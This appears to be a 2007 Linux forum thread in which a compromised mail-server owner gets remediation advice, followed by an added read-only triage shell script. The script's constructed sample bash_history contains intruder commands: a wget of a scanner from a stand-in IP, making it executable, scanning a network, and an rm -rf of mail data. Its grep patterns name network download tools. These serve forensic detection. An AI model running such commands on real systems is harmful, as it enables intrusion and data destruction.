LinuxQuestions.org
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Old 05-01-2007, 01:37 PM   #1
crown_bd
LQ Newbie
 
Registered: Apr 2007
Posts: 6

Rep: Reputation: 0
Breaking Linux Security


Dear All,
Good day. I have a mail server running Red Hat Linux, sendmail and openwebmail. It was running well, but for the last few days, every night, somebody logs in to my server while hiding his user name and password. I can only see his work from bash_history. Every time he logs in, he makes some folders, downloads some files from different web sites, installs them on my server and runs them. Most of them are scanning scripts, and sometimes he deletes my files and folders. I have already allowed only my IP block in the hosts.allow file for login, but with no result. This situation makes me feel very unsafe.

Is anybody here able to help me protect my server from him? This is very urgent for me.

Thank you all again.

With regards,

M. Crown

 
Old 05-01-2007, 01:46 PM   #2
Mara
Moderator
 
Registered: Feb 2002
Location: Grenoble
Distribution: Debian
Posts: 9,696

Rep: Reputation: 232Reputation: 232Reputation: 232
If it's an ssh login, block ssh remote access and use only the local console. That means: turn off sshd. If you have more remote login methods, turn them all off. Then start looking into the possible holes. Start by checking user accounts (empty passwords?), then all the services you run.

No matter what, it will probably end with complete reinstall (with data copied to another media, of course).

For references, look into unSpawn's links: http://www.linuxquestions.org/questi...ad.php?t=45261
 
Old 05-01-2007, 02:54 PM   #3
rcase5
Member
 
Registered: Apr 2004
Distribution: Fedora & Debian
Posts: 38

Rep: Reputation: 15
Beefing up security

Sounds like someone's a little lax in their security policies.

Sounds like whoever is getting in is able to use the 'root' account. Start by changing the password to the 'root' account. Make this something not easy to guess. Actually, you should make it something impossible to guess. I would write down random characters, including symbols such as !, $, etc., and then change the password to that. Make it very long (at least 10 characters), and put it in a safe place, then destroy it when (or if) you memorize it.

Next, if you're using telnet to access the system, stop! Anyone can observe what you are doing, including entry of passwords. Use SSH. There is no reason why anyone should need to use Telnet, since there are lots of good SSH clients available, even if you are using Windows ('putty' is a good one, and it's free).

Next, check your sshd_config file. Check the following:
PermitEmptyPasswords no
PermitRootLogin no

NEVER EVER allow someone to directly login as root remotely.

It sounds like someone obviously knows one of your usernames and passwords. At a minimum, you should change the passwords to your user accounts. For extra measure, I would change the usernames as well. Make sure they all have passwords, and they should be passwords that are not easy to guess. Don't be shy about imposing standards on passwords for your users.

Also, make sure they don't have something running on your system that can observe these changes and report them to whoever is doing this. You could do all of this and it would all be for naught. If you're not sure whether something is a legit process, do a 'ps -ef' command and post it here. Someone here should be able to tell if a process is bogus. If something isn't legit, kill it ('kill -9 <processnumber>').

Hope this helps.
 
Old 05-01-2007, 07:56 PM   #4
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
If he's able to delete your files, it's likely that he has gained root access (as pointed out above). Because he has gained root, the attacker has the ability to do whatever he/she likes, including replacing system binaries with trojaned versions or putting other backdoors on the system that may be extremely difficult to detect. Unless you have some means of detecting *every* single change on the system (such as a tripwire footprint of the system taken before the compromise), there is *NO* other way you can be sure that the system is secure. Simply changing the root password or shutting off SSH is absolutely not an effective means of securing the system. You need to reformat and reinstall.

That being said, you may want to do some forensics on the system to determine how the attacker gained access to the system (e.g. through SSH brute force, web application hole, unpatched service, etc.). You may want to start by posting the bash_history info as that may help narrow things down; also, could you give a list of the services that were run on the system (SSH, apache, PHP, FTP, etc.)? However, in the end you will need to rebuild the server from trusted media.

Last edited by Capt_Caveman; 05-01-2007 at 07:57 PM.
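A read-only triage script that pulls together the checks from posts #2, #3 and #4: Mara's empty-password accounts, the two sshd_config directives rcase5 lists, a look for extra UID 0 accounts, and a scan of the bash_history the original poster is reading. This is an added example, not code from any of the posters. It assumes you have copied sshd_config, shadow, passwd and bash_history off the suspect box into one directory; the sample evidence it generates with --demo is constructed for the example and the function names are the example's own.

```shell
#!/bin/sh
# Added triage example for this thread, not code from any of the posters.
# Reads COPIES of sshd_config, shadow, passwd and bash_history taken off
# the suspect box (all under one directory) and reports what posts #2-#4
# ask about. It fixes nothing: per Capt_Caveman, the fix is a rebuild.

# Effective global value of an sshd_config keyword. OpenSSH honours the
# FIRST uncommented occurrence, so "PermitRootLogin no" appended at the
# end does not override an earlier "yes". Lines after "Match" are
# conditional, so the scan stops there. Prints "unset" when absent.
sshd_effective() {                # sshd_effective FILE KEYWORD
    awk -v k="$2" '
        /^[[:space:]]*(#|$)/      { next }          # comments, blanks
        tolower($1) == "match"    { exit }          # end of global part
        tolower($1) == tolower(k) { print $2; found = 1; exit }
        END { if (!found) print "unset" }
    ' "$1"
}

# The two directives rcase5 lists. PermitRootLogin defaulted to "yes"
# until OpenSSH 7.0, so on a 2007 box "unset" counts as weak.
check_sshd_config() {             # check_sshd_config FILE -> ..., "weak=N"
    weak=0
    case "$(sshd_effective "$1" PermitRootLogin)" in
        no|without-password|prohibit-password)
            echo "OK   PermitRootLogin" ;;
        *)  echo "WEAK PermitRootLogin (root can log in with a password)"
            weak=$((weak + 1)) ;;
    esac
    case "$(sshd_effective "$1" PermitEmptyPasswords)" in
        yes) echo "WEAK PermitEmptyPasswords yes"; weak=$((weak + 1)) ;;
        *)   echo "OK   PermitEmptyPasswords (default is no)" ;;
    esac
    echo "weak=$weak"
}

# Mara's check: accounts whose shadow password field is empty, i.e. no
# password at all ("!" or "*" there means locked, which is fine).
empty_password_accounts() {       # empty_password_accounts SHADOWFILE
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Backdoor accounts: anything other than root with UID 0.
extra_uid0_accounts() {           # extra_uid0_accounts PASSWDFILE
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# History lines matching what crown_bd describes: fetch a file, make it
# executable, work out of a scratch directory. Output is "N:line".
suspicious_history() {            # suspicious_history HISTFILE
    fetch='(^|[[:space:];&|(])(wget|curl|lynx|fetch|ftp|tftp|nc|ncat)[[:space:]]'
    mode='chmod[[:space:]]+([+]x|[0-7]{3,4})'
    scratch='(^|[[:space:];&|])(\./|/tmp/|/dev/shm/|/var/tmp/)'
    grep -n -E "$fetch|$mode|$scratch" "$1" || true
}

run_triage() {                    # run_triage DIR
    echo "== sshd_config";     check_sshd_config "$1/sshd_config"
    echo "== empty passwords"; empty_password_accounts "$1/shadow"
    echo "== extra UID 0";     extra_uid0_accounts "$1/passwd"
    echo "== history hits";    suspicious_history "$1/bash_history"
}

# Constructed sample evidence so the script runs stand-alone. Nothing
# here is real data from the poster's server; the hashes are dummies.
make_samples() {                  # make_samples DIR
    cat > "$1/sshd_config" <<'EOF'
# constructed sample, loosely like a Red Hat default of the era
PermitRootLogin yes
#PermitEmptyPasswords no
PasswordAuthentication yes
PermitRootLogin no
EOF
    cat > "$1/shadow" <<'EOF'
root:$1$dummy$notarealhash000000000000:13600:0:99999:7:::
crown:$1$dummy$notarealhash000000000001:13600:0:99999:7:::
test::13600:0:99999:7:::
EOF
    cat > "$1/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
crown:x:500:500::/home/crown:/bin/bash
test:x:501:501::/home/test:/bin/bash
toor:x:0:0::/tmp:/bin/bash
EOF
    cat > "$1/bash_history" <<'EOF'
ls -la
mkdir /tmp/.x
cd /tmp/.x
wget http://203.0.113.10/scan.tgz
tar xzf scan.tgz
chmod +x scan
./scan 10.0.0.0/8
rm -rf /home/crown/mail
EOF
}

if [ "${1:-}" = "--demo" ]; then
    d=$(mktemp -d) && make_samples "$d" && run_triage "$d"; rm -rf "$d"
elif [ $# -gt 0 ]; then
    run_triage "$1"
fi
```

Run `sh triage.sh --demo` to see it against the constructed sample, or `sh triage.sh /mnt/evidence` against copies of the real files. Two caveats worth keeping in mind while reading the output. First, hosts.allow only governs services that consult TCP wrappers (sshd built with libwrap, anything under xinetd, sendmail if built with it); Apache and therefore openwebmail ignore it, so a webmail hole walks straight past that change. Second, `rpm -Va` on a Red Hat box will flag modified packaged files, but a root-level intruder can alter the rpm database and binary too, so treat its output as a lead for the forensics Capt_Caveman describes, not as the proof of integrity that a pre-compromise tripwire baseline would give.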
 